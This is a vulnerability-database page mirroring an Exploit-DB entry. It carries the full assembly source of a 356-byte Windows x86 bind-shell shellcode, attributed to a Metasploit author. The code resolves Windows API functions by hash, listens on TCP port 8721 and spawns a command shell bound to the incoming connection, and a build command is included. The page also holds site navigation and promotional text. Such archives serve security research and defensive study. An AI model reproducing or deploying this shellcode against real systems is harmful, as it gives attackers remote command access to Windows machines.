Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)

🗓️ 01 Jan 2009 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 24 Views

Windows/x86 (NT/XP/2000/2003) Bind TCP Shell Shellcode (356 bytes) - Listen for connection and spawn command shel

Code
;      Title:  Win32 Bind Shell
;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
;   Function:  Listen for connection and spawn command shell
;     Author:  hdm[at]metasploit.com

; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm


[BITS 32]

global _start

_start:

LCaller:
    call LLoadFunctions

LDataSegment:
;========================

dd "CMD"

dd 0x79c679e7 ; closesocket             12
dd 0x498649e5 ; accept                  16
dd 0xe92eada4 ; listen                  20
dd 0xc7701aa4 ; bind                    24
dd 0xadf509d9 ; WSASocketA              28
dd 0x3bfcedcb ; WSAStartup              32

dd 0xec0e4e8e ; LoadLibraryA            36
dd 0x73e2d87e ; ExitProcess             40
dd 0xce05d9ad ; WaitForSingleObject     44
dd 0x16b3fe72 ; CreateProcessA          48

db "WS2_32.DLL", 0x00, 0x01
;========================

LLoadFunctions:	
    pop ebx  
    push esp
	mov ebp, esp 
    mov [ebp], ebx

LKernel32Base:
    push byte 0x30
    pop ecx
    mov eax, [fs:ecx]
	mov eax, [eax + 0x0c] 
	mov esi, [eax + 0x1c] 
	lodsd				  
	mov ebx, [eax + 0x08] 
    jmp short LStartLoading

LLoadWinsock:
    lea edx, [edi + 44] ; get address of ws2_32.dll
    push ecx            ; save counter
    push edx            ; push address of ws2_32.dll
	call eax            ; LoadLibraryA()
    mov ebx, eax        ; save module handle 
    pop ecx             ; restore counter
    jmp short Looper2
    
LStartLoading:
    ; Start loading addresses at ebp + 12
    push byte 0x08
    pop esi
    add esi, ebp 

    ; Function counter
    push byte 0x0a
    pop ecx
    mov edi, [ebp]
    
Looper:
    cmp cl, 0x06
    je short LLoadWinsock

Looper2:    
    push ecx                    ; save the counter
    push ebx                    ; dll handle
    push dword [edi + ecx*4]    ; function hash value
    call LGetProcAddress        ; find the address
    pop ecx                     ; restore the counter
    mov [esi + ecx * 4], eax    ; stack segment to store addresses
    loop Looper
	xor edi, edi

LWSAStartup:
	; WSAStartup(0x101, DATA) 
    sub sp, 400
	push esp
	push 0x101
	call [ebp + 32]

LWSASocketA:
	; WSASocketA(2,1,0,0,0,0) 
	push edi
	push edi
	push edi
	push edi
	inc edi
	push edi
	inc edi
	push edi
	call [ebp + 28]
	mov ebx, eax                ; save socket to ebx
    xor edi, edi
    
LBind:
	push edi
	push edi
	push dword 0x11220002 ; port 8721
	mov esi, esp
	push byte 0x10        ; length
	push esi
	push ebx
	call [ebp + 24]

LListen:
	push edi
	push ebx
	call [ebp + 20]

LAccept:
	push edi
	push esi
	push ebx
	call [ebp + 16]
	mov edx, eax

LCreateProcessStructs:
	; allocate space for STARTUPINFO, PROCESS_INFORMATION 
	sub sp, 0x54

	; zero out SI/PI 
	lea edi, [esp]
	xor eax, eax
    push byte 21
    pop ecx
    
LBZero:
	rep stosd
    
    mov edi, edx
	mov byte [esp + 16], 68	 ; si.cb = sizeof(si) 
	inc byte [esp + 61]		 ; si.dwFlags = 0x100 

	; socket handles 
	mov [esp + 16 + 56], edi
	mov [esp + 16 + 60], edi
	mov [esp + 16 + 64], edi

	lea eax, [esp + 16]	; si 
	push esp			; pi 
	push eax
	push ecx
	push ecx
	push ecx
    
    inc ecx
	push ecx
    dec ecx
    
	push ecx
	push ecx
	push dword [ebp]
	push ecx

LCreateProcess:
	call [ebp + 48]
	mov ecx, esp
    
LWaitForSingleObject:
    push 0xFFFFFFFF
    push dword [ecx]
    call [ebp + 44]

LCloseSocket:
    push edi
    call [ebp + 12]

LFinished:
    call [ebp + 40]
  
LGetProcAddress:
	push ebx
	push ebp
	push esi
	push edi
	mov ebp, [esp + 24]			
	mov eax, [ebp + 0x3c]		
	mov edx, [ebp + eax + 120]
	add edx, ebp				
	mov ecx, [edx + 24]			
	mov ebx, [edx + 32]
	add ebx, ebp

LFnlp:

	jecxz	LNtfnd
	dec ecx
	mov esi, [ebx + ecx * 4]
	add esi, ebp				
	xor edi, edi
	cld

LHshlp:

	xor eax, eax
	lodsb
	cmp al, ah
	je LFnd
	ror edi, 13
	add edi, eax
	jmp short LHshlp

LFnd:
	
	cmp edi, [esp + 20]
	jnz LFnlp
	mov ebx, [edx + 36]			
	add ebx, ebp
	mov cx, [ebx + 2 * ecx]		
	mov ebx, [edx + 28]			
	add ebx, ebp
	mov eax, [ebx + 4 * ecx]	
	add eax, ebp
	jmp short LDone

LNtfnd:
	xor eax, eax

LDone:
	mov edx, ebp
	pop edi
	pop esi
	pop ebp
	pop ebx
	ret 8

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
windows platformtcp protocolshellcodecommand shellmetasploitassemblybind shelltcp port 8721securityvulnerabilitythreatexploit
24